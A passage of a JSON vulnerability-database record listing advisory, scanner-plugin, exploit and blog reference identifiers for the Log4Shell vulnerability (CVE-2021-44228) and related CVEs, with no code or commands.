"4271B86469CFCE465E783BEC3C9F3EDD13D645F55A5BEB697F3A4FCF694E568B", "4AB0975E08BC56107FE408EAB5B5BE88E706B439236C7F566A37398C9C1E0CCB", "519FF26BE329CC59BFF47E2AAC0D4B73FCA35BCF836D736A007D121863323E8C", "53949D71EE0D6BBA6C433F4DE402EC6D1ED7AA7877C8B84C15AD5E27FFEBE24E", "53D2631E5E76894870663A2B4948D3A4F72BDEEDF8C87935B788F981BEE5852B", "58868A8A56E187AE7CFDC0168A9534F5C483AC0F042B7ADF09CCBE3D8A901101", "5C78D16785206BA3DE0656E1DA67E30BC720F22BB98882FCD6029110F7F105E2", "68F256DC5E144D5A2404101E56A66160645897F9BB7E8600047077C626B2FE43", "6CB020CE84694787BB12E05DCB6CC95C33681B735ED0D48ED68FF5A99DD1D7A4", "6FCF3A6897C9A1A085633762339E7EC8DFE631B6D2A160FA5D1ADBC3E11F92E1", "78F199BD0B7C851B9B51668C7C03C7066EA862D4D07B5141F8116EE923472533", "7E846C52FF7D26445DCFC4472B6BC7E4EEADFD45513EDDFC6C395E9B800F576B", "8191B5D601C7F186266C65C8DC79A0B94EDA45737524796672F9272DD3278F4E", "8968C94B71BE086C952CFA8BF1B1924C1CF6FFECA8B8864B828E68AABA1D96E8", "8FA41F50A028003D6689B034A6CA3E840361D121B9F4B4350B17EAB4605438C4", "9D21714C8A46FFA3AB195D14E14C9E6854AE7C8D7E68CC48DA42B63AB322B14A", "9D675243F41B597AEE7EC01ACEA307E5B73DA85724CE286F50180E2EF0DDC2E8", "9E08A11DD23150C79E969A8FA933F7C903468F74CE144600AC32149CD9CCC3CD", "A6A496B2E032EDA1F9C9B0D3982C6A52B7D925C02D0F2EFE157394C4851AEBA7", "AA3BDAF8E33B6E3ED2F924A99C734FE82BC738F506CB900388E32E3FD4CCDA88", "AC1B4BF839D3912B4646DFB21DA46EFE78B9249D5C29B4FAB631753998720DBE", "B47B01CFCEE320F0AE033C32D22579706D0B59585EDEDF3D908CA06FA3E92084", "B682A1DCF5A33AB9CBD3062B0DF0A131D5180AA2BBD201782B95DC8A2C33D1AA", "B7376C4EB80B7D4936C0682206BD2DC0AD5969B181368D3EB95A8FBA366BDB63", "BE7DD314CD7039219534B2612D0FEFD382DCC5D154AD49257A517A91FA728423", "C7FAA00C9C125584B8B9505CE7E7AC97AF7514904E37D2747A78CB0B5B0F3315", "CA111B4E9CA9EC240292C6D00FE0CF8C7559AC1453E3199BC3370D149FB11174", "CE6A6F0970C169F7DBE65AA5DFCFCEC0BEA99E837906D043FD4B6D3BF7A87D67", "D928C805B6C7AD1BA5D5DA1EB77352559E54787E379CD22474A13592C0B83C20", "DCE05236BD35B28C109059A740CACEE5CE345130605BA9DEA39EFDA6BC532303", "E1810AD4BA382A8D222D20A49D11C634E6C5240D3F69652E51FC068062DED465", "E636319395E5D666C247860149142969762B284D3BE296819A5644E6AE6DDA15", "E679F241D5F455DCABCB653D142792B97352015B6DD79A1EB36DB0B4D54B2902", "EBDD1B77CC71D5E7D7E88D21F7F8C7988F44B743E7ABCFC5258E806235EC65A9", "ED78D94545EF8A4A811D2C198EC427B8C46CA1FE3BBC9D6A2DC20DD440CB6FDC", "EFC94A6E1DA52C8EA7A5811D6A4381770FA24130DB4CFD911120046DD916261B"]}, {"type": "ics", "idList": ["ICSA-22-034-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:357497C932E21C66FB08D2C9B8EE9CA2", "IMPERVABLOG:BB63986B2DE2CCB2C65DD3747791097F", "IMPERVABLOG:BE9CCB7ADF74E2AEFC999FEE704CDE71", "IMPERVABLOG:BEE8EB9D446D0AF62464EE59DFA0CE0E", "IMPERVABLOG:DB0BBA5A6E2E523FAA7F7A73C45FEA96"]}, {"type": "kaspersky", "idList": ["KLA12390", "KLA12392", "KLA12393"]}, {"type": "kitploit", "idList": ["KITPLOIT:134021490040098714", "KITPLOIT:144331229809700743", "KITPLOIT:1680589374755422772", "KITPLOIT:3188944951765917430", "KITPLOIT:3773942873037113539", "KITPLOIT:4125185526326677098", "KITPLOIT:4333067961180534072", "KITPLOIT:4654779182065061303", "KITPLOIT:5104415481503400470", "KITPLOIT:522409803487164759", "KITPLOIT:5734436811250397170", "KITPLOIT:5789499291738758939", "KITPLOIT:6422486000446318290", "KITPLOIT:6759391622067035795", "KITPLOIT:7976092996345827446", "KITPLOIT:8031680161397698025", "KITPLOIT:8148701901300660800", "KITPLOIT:8266451932034361580", "KITPLOIT:8945091038325456871"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:39A05D4A4EC81966F7A1721DFACB3470", "MALWAREBYTES:A325F8FB1D527BD3C6C1C3A187840632", "MALWAREBYTES:C265FF6D1D82CDE3FB6E6C1E4248A791"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/LOG4SHELL_SCANNER/", "MSF:EXPLOIT/MULTI/HTTP/LOG4SHELL_HEADER_INJECTION/"]}, {"type": "mmpc", "idList": ["MMPC:42ECD98DCF925DC4063DE66F75FB5433", "MMPC:BB2F5840056D55375C4A19D2FF07C695"]}, {"type": "mscve", "idList": ["MS:CVE-2021-44228"]}, {"type": "msrc", "idList": ["MSRC:543F3A129A47F4B14FB170389908717B"]}, {"type": "mssecure", "idList": ["MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:BB2F5840056D55375C4A19D2FF07C695"]}, {"type": "nessus", "idList": ["AL2_ALAS-2021-001.NASL", "AL2_ALAS-2021-1730.NASL", "AL2_ALAS-2021-1731.NASL", "ALA_ALAS-2021-1553.NASL", "APACHE_JSPWIKI_LOG4SHELL.NBIN", "APACHE_LOG4J_2_15_0.NASL", "APACHE_LOG4J_JDNI_LDAP_GENERIC.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_HTTP_HEADERS.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_TELNET.NBIN", "APACHE_LOG4J_JNDI_LDAP_GENERIC_RAW.NBIN", "APACHE_LOG4J_WIN_2_15_0.NASL", "APACHE_LOG4SHELL_IMAP.NBIN", "APACHE_LOG4SHELL_NETBIOS.NBIN", "APACHE_LOG4SHELL_POP3.NBIN", "APACHE_LOG4SHELL_SMTP.NBIN", "APACHE_LOG4SHELL_SSH.NBIN", "APACHE_OFBIZ_LOG4SHELL.NBIN", "APACHE_SOLR_LOG4SHELL.NBIN", "APPLE_IOS_153_CHECK.NBIN", "DEBIAN_DLA-2842.NASL", "DEBIAN_DSA-5020.NASL", "DEBIAN_DSA-5022.NASL", "FREEBSD_PKG_1EA05BB85D7411ECBB1E001517A2E1A4.NASL", "FREEBSD_PKG_3FADD7E4F8FB45A0A2188FD6423C338F.NASL", "FREEBSD_PKG_4B1AC5A35BD411EC8602589CFC007716.NASL", "FREEBSD_PKG_515DF85A5CD711ECA16D001517A2E1A4.NASL", "LOG4J_LOG4SHELL_FTP.NBIN", "LOG4J_LOG4SHELL_PPTP.NBIN", "LOG4J_LOG4SHELL_RPCBIND.NBIN", "LOG4J_LOG4SHELL_SIP_INVITE.NBIN", "LOG4J_LOG4SHELL_SMB.NBIN", "LOG4J_LOG4SHELL_WWW.NBIN", "OPENSUSE-2021-1577.NASL", "OPENSUSE-2021-1586.NASL", "OPENSUSE-2021-1601.NASL", "OPENSUSE-2021-3999.NASL", "OPENSUSE-2021-4094.NASL", "OPENSUSE-2021-4107.NASL", "OPENSUSE-2021-4109.NASL", "UBUNTU_USN-5192-1.NASL", "UBUNTU_USN-5192-2.NASL", "UBUNTU_USN-5197-1.NASL", "VMWARE_HORIZON_LOG4SHELL.NBIN", "VMWARE_VCENTER_LOG4SHELL.NBIN", "WEB_APPLICATION_SCANNING_113075"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165261", "PACKETSTORM:165270", "PACKETSTORM:165642"]}, {"type": "paloalto", "idList": ["PA-CVE-2021-44228"]}, {"type": "qt", "idList": ["QT:7EFAEDCED59EA2EE3AB98A0A484C5825"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:13C1A00A7D0A7B1BB16D0AB5B1E9B51A", "QUALYSBLOG:3FADA4B80DBBF178154C0729CFC1358F", "QUALYSBLOG:42335884011D582222F08AEF81D70B94", "QUALYSBLOG:5059D1C3913FB6542F3283A66F9B3A43", "QUALYSBLOG:68BBBF644900DA0A883AABB0E4E3F28B", "QUALYSBLOG:C3C14B989683A02C2C9A98CE918FBC3C"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:078D5EE222682A75AE1A1A3A3684E38D", "RAPID7BLOG:18D49792276E208F17E7D64BCE2FDEF6", "RAPID7BLOG:1D39E7BBA13704DCBB8153C89ABE6B72", "RAPID7BLOG:2FFDE45F01FA44216BE91DD7AFA0D060", "RAPID7BLOG:4CDB288231FA4BF52C0067D9D4FEABBF", "RAPID7BLOG:6EADCD983283E3D546EF2907978E95F1", "RAPID7BLOG:7767347A5784FF1C4901601A1A21D2C8", "RAPID7BLOG:7F1312E79E0925118565C90443170051", "RAPID7BLOG:9CB105938BDE92F573A2DE68BC20CF46", "RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44", "RAPID7BLOG:CB62092B4C7E70876CF276BA04DD7597", "RAPID7BLOG:D1E1A150733F5AFC2C704DB26E7EAB30", "RAPID7BLOG:E3D08ECAA9A93569D5544F4D6AAEEB74", "RAPID7BLOG:E43819A7DE1DD0F60E63E67A27B9301B", "RAPID7BLOG:F37BD0C67170721734A26D15E6D99B3E", "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630"]}, {"type": "redhat", "idList": ["RHSA-2022:0082", "RHSA-2022:0223"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-4104", "RH:CVE-2021-4125", "RH:CVE-2021-44228", "RH:CVE-2021-45046", "RH:CVE-2021-45105"]}, {"type": "securelist", "idList": ["SECURELIST:7A375F44156FACA25A0B3990F2CD73C1", "SECURELIST:9CC623A02615C07A9CEABD0C58DE7931"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1577-1", "OPENSUSE-SU-2021:1586-1", "OPENSUSE-SU-2021:1601-1", "OPENSUSE-SU-2021:3999-1", "OPENSUSE-SU-2021:4094-1", "OPENSUSE-SU-2021:4107-1", "OPENSUSE-SU-2021:4109-1"]}, {"type": "symantec", "idList": ["SMNTC-19793"]}, {"type": "thn", "idList": ["THN:2656971C06C4E3D4B0A8C0AC02BBB775", "THN:5BAE3325983F971D1108722C454FF9AB", "THN:5CB7AEBFFE369D293598A4FDBFDFCEE3", "THN:602D65D576B090BAC4B0C96998F8F922", "THN:668DE2C9CFD709125451AF8F3FE12E6C", "THN:686DDFA07B415C41BA7AB9B8970557EF", "THN:76D7572EDBE770410D6F0518DAD8B0AD", "THN:833B2B9623F1C64D20868B947E8BE4E0", "THN:83D31EE6B3E59778D812B3B7E67D7CD6", "THN:933FE23273AB5250B949633A337D44E1", "THN:AFF2BD38CB9578D0F4CA96A145933627", "THN:DCB20559AE0C35EB864725D482E268C2"]}, {"type": "threatpost", "idList": ["THREATPOST:065F7608AC06475E765018E97F14998D", "THREATPOST:10D0F1DDDD6C211DA3CE6395900B7C54", "THREATPOST:187B01687ED5D3975CD6E42E84DD9B13", "THREATPOST:27C5AA551B5793DEA8848FB76DE52B32", "THREATPOST:34D98758A035C36FED68DDD940415845", "THREATPOST:38E8D69F26ADB15A989532924B2A98C4", "THREATPOST:3A5F59D56E40560C393A3F69A362A31B", "THREATPOST:46837E7270195429E1D891848E911254", "THREATPOST:49177F7B5015CE94637C97F64C2D4138", "THREATPOST:4D63851D1493E3861204B674ADBC7F01", "THREATPOST:5B9D3D8DB4BFEDE846215C1877B275ED", "THREATPOST:5CCE0C2607242B16B2880B331167526C", "THREATPOST:76A5549135F9D578FFC2C8FACC135193", "THREATPOST:89AA48C3C48FA427AB660EDEE6DBCBE2", "THREATPOST:8A372065BFA1E6839DAF0386E9D8A1F5", "THREATPOST:AFD74E86954C5A08B3F246887333BDF3", "THREATPOST:B318814572E066732E6C32CC147D95E2", "THREATPOST:B8BEEE8F3BDF1B6AD88639DA8C4595EA", "THREATPOST:D098942E4435832E619282E1B92C9E0F"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:C927C873A9E9A7AF6B74D64EFAFA6B02"]}, {"type": "typo3", "idList": ["TYPO3-PSA-2021-004"]}, {"type": "ubuntu", "idList": ["USN-5192-1", "USN-5192-2", "USN-5197-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-44228"]}, {"type": "vmware", "idList": ["VMSA-2021-0028.10", "VMSA-2021-0028.9"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:060FBB90648BCDE11554492408AE89C8", "WALLARMLAB:2AAA5E62EED6807B93FB40361B4927CB", "WALLARMLAB:90D3FFE69FF928689D36310EF8B1C4F3", "WALLARMLAB:E86F01AF50087BEB03AAB46947CDE884"]}, {"type": "zdt", "idList": ["1337DAY-ID-37135", "1337DAY-ID-37136", "1337DAY-ID-37257"]}]}, "dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:65F0FA2139A357151F74FA41EF42B50F", "AKAMAIBLOG:7E872DA472DB19F259EC6E0D8CA018FF", "AKAMAIBLOG:B0985AEDEB4DAED26BDA30B9488D329D", "AKAMAIBLOG:B0DBF0121097FA293565FB7E66E09AB3"]}, {"type": "almalinux", "idList": ["ALSA-2022:1777"]}, {"type": "amazon", "idList": ["ALAS-2021-1553", "ALAS-2021-1554", "ALAS-2022-1580", "ALAS-2022-1601", "ALAS2-2021-1730", "ALAS2-2021-1731", "ALAS2-2021-1732", "ALAS2-2022-1739", "ALAS2-2022-1773", "ALAS2-2022-1806"]}, {"type": "amd", "idList": ["AMD-SB-1034"]}, {"type": "apple", "idList": ["APPLE:02740BCB30C345C4CD19795FBD8FD739", "APPLE:16752A28F5EAA2C135C9F24F2AA98541", "APPLE:251C897D47AD6A2DB0B7E3792A81C425", "APPLE:4A4048A18F34C672CBA0BD1BE526B92E", "APPLE:52E627AE8868F50352A397AD32DB5373", "APPLE:99DB3A974D6753D61A4B9F20ACDACD13", "APPLE:99E4CCCCE2782591968B06F1CD58BA2D", "APPLE:A9EDC29DCEC8CDEC250D783F058D98B8", "APPLE:EC977EE6AFB398593194B16BEAF964E4", "APPLE:EF619761E522E15BAB653ACD81383CBF", "APPLE:F2C11F0D9C46752E77BED53DE4EE5912"]}, {"type": "arista", "idList": ["ARISTA:0070"]}, {"type": "atlassian", "idList": ["CRUC-8529", "FE-7368"]}, {"type": "attackerkb", "idList": ["AKB:0B6C144F-2E5A-4D5E-B629-E45C2530CB94", "AKB:12497ECD-6565-46DB-AD65-2F25827C7711", "AKB:21AD0A36-A0AA-486B-A379-B47156286E9E", "AKB:3191CCF9-DA8E-43DF-8152-1E3A5D1A3C45", "AKB:398CAD69-31E4-4276-B510-D93B2C648A74", "AKB:B1318EAC-2E60-4695-B63B-2D10DAAA5B0E", "AKB:F2A441BA-2246-446C-9B34-400B2F3DD77B", "AKB:F7DBB7CA-A582-4BC6-87C3-ACA4DBC4F58B"]}, {"type": "avleonov", "idList": ["AVLEONOV:469525DB37AAC7A2242EE80C1BCBC8DB", "AVLEONOV:89C75127789AC2C132A3AA403F035902", "AVLEONOV:FEA9E4494A95F04BD598867C8CA5D246"]}, {"type": "cert", "idList": ["VU:930724"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0936", "CPAI-2022-0325"]}, {"type": "checkpoint_security", "idList": ["CPS:SK176865"]}, {"type": "cisa", "idList": ["CISA:006B1DC6A817621E16EEB4560519A418", "CISA:380E63A9EAAD85FA1950A6973017E11B", "CISA:45B6D68A097309E99D8E7192B1E8A8BE", "CISA:6C962B804E593B231FDE50912F4D093A", "CISA:7135D71F3A4288760C8E71D4E553A3B4", "CISA:8367DA0C1A6F51FB2D817745BB204C48", "CISA:918B5EC3622C761B0424597D3F7AFF7C", "CISA:920F1DA8584B18459D4963D91C8DDA33", "CISA:F0D9A1ED5C31628B8E6D1E5F3AD609C4", "CISA:F3C70D08CAE58CBD29A5E5ED6B2AE473"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2021-44228", "CISA-KEV-CVE-2022-22587", "CISA-KEV-CVE-2022-22620"]}, {"type": "cisco", "idList": ["CISCO-SA-APACHE-LOG4J-QRUKNEBD"]}, {"type": "citrix", "idList": ["CTX335705"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:690C01663F820378948F8CF2E2405F72"]}, {"type": "cve", "idList": ["CVE-2021-3100", "CVE-2021-4104", "CVE-2021-4125", "CVE-2021-44228", "CVE-2021-44530", "CVE-2021-45046", "CVE-2022-0070", "CVE-2022-22587", "CVE-2022-22594", "CVE-2022-22620", "CVE-2022-23848", "CVE-2022-33915"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2842-1:95CB4", "DEBIAN:DSA-5020-1:32A64", "DEBIAN:DSA-5022-1:D26EE", "DEBIAN:DSA-5083-1:1231B", "DEBIAN:DSA-5084-1:8E2FE"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-4104", "DEBIANCVE:CVE-2021-44228", "DEBIANCVE:CVE-2021-45046", "DEBIANCVE:CVE-2022-22594", "DEBIANCVE:CVE-2022-22620"]}, {"type": "exploitdb", "idList": ["EDB-ID:50590", "EDB-ID:50592"]}, {"type": "f5", "idList": ["F5:K19026212", "F5:K24554520", "F5:K32171392", "F5:K34002344"]}, {"type": "fedora", "idList": ["FEDORA:0A343304CB93", "FEDORA:548FD3102AB0", "FEDORA:59AA230A7074", "FEDORA:95A5B306879A", "FEDORA:A5A703103140"]}, {"type": "fortinet", "idList": ["FG-IR-21-245"]}, {"type": "freebsd", "idList": ["1EA05BB8-5D74-11EC-BB1E-001517A2E1A4", "3FADD7E4-F8FB-45A0-A218-8FD6423C338F", "4B1AC5A3-5BD4-11EC-8602-589CFC007716", "515DF85A-5CD7-11EC-A16D-001517A2E1A4", "650734B2-7665-4170-9A0A-EECED5E10A5E", "93A1C9A7-5BEF-11EC-A47A-001517A2E1A4"]}, {"type": "gentoo", "idList": ["GLSA-202208-39"]}, {"type": "github", "idList": ["GHSA-3QPM-H9CH-PX3C", "GHSA-7RJR-3Q55-VV33", "GHSA-FP5R-V3W9-4333", "GHSA-J3CH-VJPH-8Q6V", "GHSA-J7C3-96RF-JRRP", "GHSA-JFH8-C2JP-5V3Q", "GHSA-MF4F-J588-5XM8", "GHSA-V57X-GXFJ-484Q", "GITHUB:070AFCDE1A9C584654244E41373D86D8", "GITHUB:D32BE0B8A571761A967462652837D28F"]}, {"type": "githubexploit", "idList": ["00264586-32AF-5469-819B-90FBDA0B6FF2", "00423BD1-64DA-5DB0-848E-1BACC0883E15", "0099FB22-A94E-5D32-9BC4-2EC6D5CFFA9C", "016A0841-D1FF-5056-B062-0D08FCE624CB", "0241DC13-63CB-580C-BDC6-78F8BB03567D", "024D29D3-309F-5B7F-B8C9-2AF149F9A213", "030066BA-6C48-5AD9-9EAF-11DECB6A3930", "034AFC0C-D411-5F4A-BBAB-630A6C972933", "03C230DA-F801-5660-BF8E-AB8F44E2755C", "0420DA06-BC6E-5B30-8BA3-E30BDE351E15", "0568D2CD-87AF-5D34-AA65-868B1DDA0A89", "0577D04A-4517-5872-B4C0-E45DD6246D88", "066BA250-177D-5017-9AC2-6B948A465ABC", "06D271D5-7A61-5692-9778-7F521D52F980", "0793D7AB-F57C-5832-B456-4057704CAEC9", "07C462E5-20A3-5023-B363-47E1B0C1AE4E", "09509FA9-9FC3-5B64-900D-F0842DC8BCF7", "09F9BA9F-83A2-52EF-81A0-214FCD9E240D", "0A26B4F0-3175-58BE-9CE7-133C9D85E181", "0ABA9FB5-93DD-59F1-9580-232DBFBB4AD8", "0B596CD2-49C7-50A8-A43C-8DE3027EC2B7", "0BC62E37-D6E2-5B2C-BF89-3E00D98D2E30", "0C98B78F-B467-5298-825B-05ECB4EE2653", "0CBB2E72-C52F-59B6-BD73-DBDD206C4C35", "0CEA12C7-97F6-5BF5-88FF-6797542A037F", "0D243A34-B42E-5007-90D0-A30ECABDA204", "0D4B651A-4424-55FE-B496-1BB733DE7EE2", "0D6ADE4E-8BA2-5BA9-94CB-ED90234A9B5C", "0E43C674-363B-53C2-8686-6F412A995AF4", "0E47338D-BDC0-510A-BC15-093F2E1DEF2C", "0E8471F7-D213-552B-ABD8-B3B1FAD4B910", "1097EF60-FC77-5135-B92B-4A84B46FABAF", "11719BED-E629-5C79-944E-7E40BBFC460C", "126A30D2-0273-510B-B34A-DF7AE6E0C1C0", "129B39DD-AB9E-54F0-B6B4-5EA17F29B7DF", "12AAE278-1B08-5F3E-AC28-8EC928D3D7C8", "13542749-F70C-5BAA-A20C-8A464D612535", "1370FA0C-A273-5E82-9EEB-7E2E5628D23E", "13EDAA06-F1A5-5097-AD3A-3D6129C325A7", "141F2E38-979B-50B5-B649-96785B255523", "14482532-2406-58DF-89FF-30B085015257", "149F99C3-6B62-5255-8DA6-A0370E6ED5F7", "14E4E272-9457-53A0-ADD5-F91385D04FCD", "161B70B2-DFA5-54B6-A4CE-45B79999AAC6", "16B2ABBF-5997-58A1-A4C9-0161F64D116C", "16C11F1E-B5B4-508E-8238-6BF3458B34D3", "16EB55EE-7CC4-58C7-86AC-E9FD7066B5F1", "170912E2-BB33-5CB8-AD90-C0A737FCAC5E", "17C204F9-DD70-5EFB-89D4-B642E65FAF99", "1AD6F414-6637-555A-AA79-BEE90EDB10AB", "1B11A8A4-B07C-580C-AF38-33A50B17B19A", "1B8CBBEC-5ABA-5792-8D2A-A51EB4CC6352", "1C354B89-0050-508B-98F4-B43CBD84F364", "1CC6B535-3451-5066-8C2E-94551FEC545E", "1CCC4512-40AB-5F72-9913-3D894DB4676F", "1D3D13FB-46D9-572A-A304-FEEC4619D37B", "1E085D9B-26F5-5960-938C-AEB76BCE61D8", "1E62A076-94ED-5061-AE4F-432BB8D7A59C", "210D354B-2338-5AA4-BB87-981C2D2BAA06", "21AACF78-8053-529E-909E-B6D5158008AC", "21B5671D-2A35-52FF-9702-380A32B96260", "21F23081-849E-5B0D-AB61-A8EB37CA0B38", "22AAF71B-053F-5E71-9F26-039C48FCCD62", "22C2FC0C-2C78-5EF7-B21B-5B76E82E2E99", "22C736D4-4179-585F-990B-A40436F65461", "231364E1-A2B1-558A-B805-F242AA97B13F", "23A2D479-181C-599C-9C0F-9A2FF201348F", "2421E200-716C-5F29-84C0-DD8B9C41D92E", "24682F53-DE0E-5967-AAC7-98806644A14C", "24751999-698F-5052-988C-193144F85A39", "254068B4-97B4-5DCF-A60F-5206B6DD230E", "26FD2B5F-2952-5624-8CB5-3ECD4480DA87", "27760EBF-2681-5AF4-B884-18C8BED5127A", "27D73012-7283-5C8D-8197-BBAE1964DEE3", "29A41C2D-FF26-591A-A88B-DDB396742BBC", "2A95146E-A404-5015-9D39-293C8EAFF4B6", "2AA77664-83AA-50B1-9F4E-37CC67A5CFAC", "2AF28508-1272-5281-BDB7-B44D3EFC7C72", "2AF7350D-AB79-5AB5-8AF9-0F351CE13D30", "2B297EB1-A602-5F7B-B21B-C34BC6EB4308", "2D2BE5CB-742A-5912-9D88-75365533F9E2", "2E7FF2D4-97E7-54F5-A5C8-EACD22FCF303", "2E946B1D-12B1-56D1-A72E-A3026C240B1D", "2EACBFB9-2956-564B-A859-6C85EF9F785A", "2F792C33-6CC6-58F1-9166-4DEA421DE2C3", "2F83846E-DF16-5074-98CB-01158DE1C6C6", "30BD2114-A602-52D3-908F-8B66A46F1A8C", "30C6DF99-400E-539F-AA8D-39E7407F4796", "31E7D7EA-2E1F-59D8-8BD7-81B8A4894F91", "32BB43C3-F80D-5CBF-83AD-55BD38C2A440", "342CC1B7-6E24-5767-A7B1-90B95A91B503", "34DFC7F1-8012-5B3A-B9F1-EFEDB5F89D1D", "3549B000-260E-5A24-9573-935F898D149C", "356A7EC9-4E47-52B9-856C-0215B3D9C70E", "35A70212-DFFC-5B38-8294-2B835B8080DE", "371D4A15-51B5-520B-B31D-856E557695FD", "3734D8ED-657E-5585-B181-DE9BE2D84456", "38AF0E71-397C-5A1E-B67C-5514D8F8ABC8", "39A13697-AF09-5E14-9DE2-045005EA9D85", "39D0749D-74E3-5D08-804A-6E7E52BCE692", "3A118B0C-1B94-5CA7-81D3-2A3230EB4DC9", "3A1D442B-2B5B-5DEA-9276-9A9B6C06C9DF", "3A8F706B-1F40-5DAB-AB25-BA023D568AFA", "3AAA878D-C72A-52A0-A5B6-0977BAF6F01D", "3ACF6BFE-C853-50C6-BD49-B76794B8BA53", "3B7408B1-9041-550E-9CB8-83E5F609C37B", "3D8E1FE1-17FA-5A92-B109-DEDB55A6BEAB", "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "3DFE8091-03AE-565B-A198-BD509784502C", "3E142E8E-743B-5786-9EB8-0FED1933F71D", "3EA1CA63-F1F5-5A86-AB97-E327DAE18E93", "3FB46D12-73E5-58EF-BC2A-4FC103B8FF72", "4066A0A4-284D-5ECC-A476-ADDA61AF9A76", "4096BFF5-03AE-5DA0-8AD6-85D69E2570C1", "40C633CE-4DD0-586D-8773-760E9A70FFBD", "4142DC43-FEB5-5B62-B8C7-B2A4DEB336A6", "42098CCD-C708-53FC-B3CD-5A8356B69359", "423CC97A-8BDD-56B9-9449-FC05A902AEC1", "4288177C-C609-5D55-A845-D6785929AB4D", "43159333-A26E-5929-A289-0C84DDCF9DEA", "43A7C9D3-EBB3-57B1-B8FB-C651B36501C2", "43CEFD04-EB9B-5765-AB94-8FF76127F1F6", "44463794-7940-582A-AFFF-676628A86A72", "444C7644-3DE2-57B2-ACF8-C2B157E07580", "44DBFE24-1B30-510A-8291-B7043C7FF654", "4557B39D-1DE6-59FA-AF6C-935E8BB15AE5", "45E71437-8181-5EB7-91BD-D6E4343DA0AB", "473FFDA9-E615-53B6-9A81-F98A1ABD700E", "47670E23-A165-5F5D-8C90-5C76DA1ADFEE", "479EB930-7609-5244-8E16-0D8689304D86", "4804958E-7699-5226-91C3-8110A4CBAB18", "48821FC8-9320-5568-88A3-9B2CC655ADAC", "4A0D603B-6526-5D1E-BADC-55B4775C354B", "4B070EB0-B690-5547-8809-F1A697118957", "4B1180FB-F4A3-5FCD-A8D2-65364D1EA9EC", "4B30BFBE-6FDC-5580-9C76-65EA4EBA5DAC", "4B38D813-5C4B-586B-930A-FDDD0FFF304B", "4BD74B8C-D553-57C6-AB15-6B899401AAA4", "4C6A108D-3631-56AD-8C3B-9677A228693B", "4CB3AC5D-871A-50AC-9037-FF9B2CBD474A", "4DBC05D1-8178-5715-953D-61ECC89104F4", "4F11FB83-F6EC-5ED2-B08D-9D86D6104DC7", "4F57CC9C-B908-544E-92E7-92A49DE89B00", "4F757EF2-574B-55C7-A017-51DC8BB28C31", "4FBD8560-2AEB-5AD2-9CA3-4A72DEDDE929", "51879B5C-E36F-52B7-B92C-DBA73A21F67D", "5233D0F2-69A2-5220-8016-07D66C226F01", "52BA1465-B7E9-59C1-A20F-E38A5EAE272D", "52E35A88-6217-55CC-B812-4EE83CECD8EB", "53A3C2F6-6EF2-52C1-924B-F3A9C95C2A88", "542348EC-7B83-50E0-8F9B-B6AE9968059F", "547FC254-3B26-59EC-AF4D-E5954678AC3D", "54AB8DD9-4A52-50E4-9EE2-046EBD899FFD", "54E7D93D-9216-5EDE-A4AD-8324A367E67B", "54FE5E76-EAF4-5D84-B37F-06F12A6AFF71", "553C3CC1-0126-5554-8BE0-5F577271EBF9", "55AD7FBC-06FB-5D26-A3A6-F9E9D63D45AC", "5644D9A0-3A8F-52F3-AE3E-300C79911A07", "57742B88-2AA6-5788-825F-92A73CA85718", "578E61DA-1B13-5170-9DAC-60D30F7F8C99", "58ACC402-1947-5FE3-9D08-021A4EFEC48A", "5A5A28A1-2601-54F3-BA06-BCFF1A9DCCA5", "5ABB537C-AD08-57E9-9A29-E747D7C29DE9", "5B1D95CD-139F-5304-8B13-BB4EDD912DFA", "5B342AC3-2399-581E-BB6A-2EF19BC35B0C", "5B6C990F-05A3-5D83-83DF-386A34FB8560", "5C040112-8DE7-57AA-B52D-BDD1965D02E3", "5C116D88-E2CC-5BC3-9A71-3174292E227D", "5CEF4882-D1D5-5861-944F-34E8868BF986", "5D72C8DC-DFFD-56F3-A7AC-9FA83C48F460", "5E633D2D-95D0-5498-840F-EA92BF2C5A00", "5E9FB294-1E29-5DE8-A6F6-6D25B08A31DC", "5FB1E3FD-68C6-50CF-85EF-DBFC0B133C24", "5FC55783-FDF5-5AD8-98B2-C1CBFB4EFCCA", "5FDC1BB6-C937-5F78-BB2D-71584272E00A", "6083DCC3-CA9C-58A4-9FBC-983DF1E52584", "608B43BB-B31C-5B8A-A962-A58902AEBF2E", "61AC9232-A772-5D63-9DFC-BFE4976418C7", "62F5F8D4-29D7-5B5C-82BC-3D56E7E8D027", "634605C6-F76D-5EDD-9986-EC4EC593168D", "63500AE8-A10A-5388-B314-001A4CFBDFBD", "6413E08F-7E60-50ED-932E-527F515A6C19", "645452DF-222B-51AD-963D-DB002A1FC803", "65EB18B2-8DBB-5A70-9080-C6DA4451D7E7", "6600C311-30E5-566D-98F1-AC47E752EBEA", "67E20854-0E30-5FC1-9F24-6A60531BAFF6", "68DCAE72-CB86-55B9-9CB6-653918238C2B", "6A34D9C3-C290-5763-BAF4-F1D6351C4BA2", "6A4495E8-D723-5923-BB6A-B9EA838CF69B", "6AC0E68D-D6F7-55D9-A281-30D7E76D7556", "6BC5CBC6-5A96-5743-8FB7-CEDDF527C52A", "6CC29A1A-24F4-5961-89F9-E7B824C6F37C", "6D93189D-E2D8-5571-88D5-D778E1CB9C23", "6DA59A94-0CD1-5357-8F01-2BF3230F9017", 